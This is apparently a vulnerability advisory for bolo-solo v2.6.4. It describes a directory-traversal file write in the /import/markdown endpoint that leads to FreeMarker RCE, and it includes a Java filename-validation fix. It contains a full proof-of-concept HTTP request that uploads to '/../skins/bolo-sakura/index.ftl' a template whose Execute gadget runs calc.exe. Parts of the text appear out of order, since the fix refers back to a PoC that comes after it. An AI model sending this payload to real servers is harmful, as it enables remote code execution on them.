In the bolo-solo v2.6.4_stable version, the 'import/markdown' feature has an arbitrary file write vulnerability due to the lack of security validation on filenames.
Vulnerability file: src/main/java/org/b3log/solo/bolo/prop/BackupService.java
In the file upload logic of this method, uploaded files are stored without any security validation of the file extension or filename, leading to a directory traversal vulnerability combined with arbitrary file upload and arbitrary file write.


The website uses FreeMarker for rendering; therefore, arbitrary file write can be used to modify .ftl template files, leading to RCE. Modify the index.ftl file under the path \bolo-solo-2.6.4\classes\artifacts\bolo_war_exploded\skins\bolo-sakura.
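The fix on the server side is to validate the uploaded filename before it reaches the filesystem. The following is an added example in Java (not bolo-solo's own code); the class name, the import directory and the allowed-extension list are assumptions:

```java
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Locale;
import java.util.Set;

// Added example, not bolo-solo's own code: map an uploaded filename to a
// location strictly inside the import directory, or reject the upload.
public final class SafeImportPath {
    // Assumption: the markdown import only needs these extensions.
    private static final Set<String> ALLOWED_EXT = Set.of("md", "markdown", "zip");

    public static Path resolve(Path importDir, String clientFilename) {
        if (clientFilename == null || clientFilename.isEmpty()) {
            throw new IllegalArgumentException("empty filename");
        }
        // Keep only the last path segment: the PoC relies on "/../skins/..."
        // reaching the filesystem layer unchanged.
        String name = clientFilename.replace('\\', '/');
        name = name.substring(name.lastIndexOf('/') + 1);
        // Allow plain filename characters only; no hidden files, no "..".
        if (!name.matches("[A-Za-z0-9_-][A-Za-z0-9._-]*")) {
            throw new IllegalArgumentException("invalid filename: " + clientFilename);
        }
        int dot = name.lastIndexOf('.');
        String ext = dot < 0 ? "" : name.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (!ALLOWED_EXT.contains(ext)) {
            throw new IllegalArgumentException("extension not allowed: " + ext);
        }
        Path base = importDir.toAbsolutePath().normalize();
        Path target = base.resolve(name).normalize();
        // Defence in depth: the final path must still be inside the import directory.
        if (!target.startsWith(base) || target.equals(base)) {
            throw new IllegalArgumentException("path escapes import directory");
        }
        return target;
    }

    public static void main(String[] args) {
        Path dir = Paths.get("/tmp/bolo-import");  // constructed directory, not the real one
        System.out.println(resolve(dir, "notes.md"));
        try {
            resolve(dir, "/../skins/bolo-sakura/index.ftl");  // filename from the PoC above
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

With this check in place the PoC filename is rejected twice over: the traversal segments are dropped and the .ftl extension is not on the allow list, so template files can no longer be overwritten through the import endpoint.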



Successfully written:

Switched the skin and accessed the page, triggering a calculator pop-up (RCE).

POC:
POST /import/markdown HTTP/1.1
Host: localhost:8080
Content-Length: 1046
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Not_A Brand";v="99", "Chromium";v="142"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEOKl8J4fcvx2RKj
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/admin-index.do
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundaryBEOKl8J4fcvx2RKj
Content-Disposition: form-data; name="file"; filename="/../skins/bolo-sakura/index.ftl"
Content-Type: application/x-zip-compressed
<#include "../../common-template/macro-common_head.ftl">
<#include 'header.ftl'>
<#assign ex="freemarker.template.utility.Execute"?new()>
${ex("calc.exe")}
<body nonce-data="4fb3a4be0d" class="home blog hfeed chinese-font">
<div class="scrollbar" id="bar">
</div>
<section id="main-container">
<div class="headertop filter-dot">
<#include 'macro-header.ftl'>
<div id="content" class="site-content">
<div id="primary" class="content-area">
<#if pjax><!---- pjax {#pjax} start ----></#if>
<#include "article-list.ftl">
<#if pjax><!---- pjax {#pjax} end ----></#if>
</div>
</div>
</div>
<#include 'macro-footer.ftl'>
</section>
<#include 'side-mobile.ftl'>
<#include 'footer.ftl'>
</body>
</html
------WebKitFormBoundaryBEOKl8J4fcvx2RKj--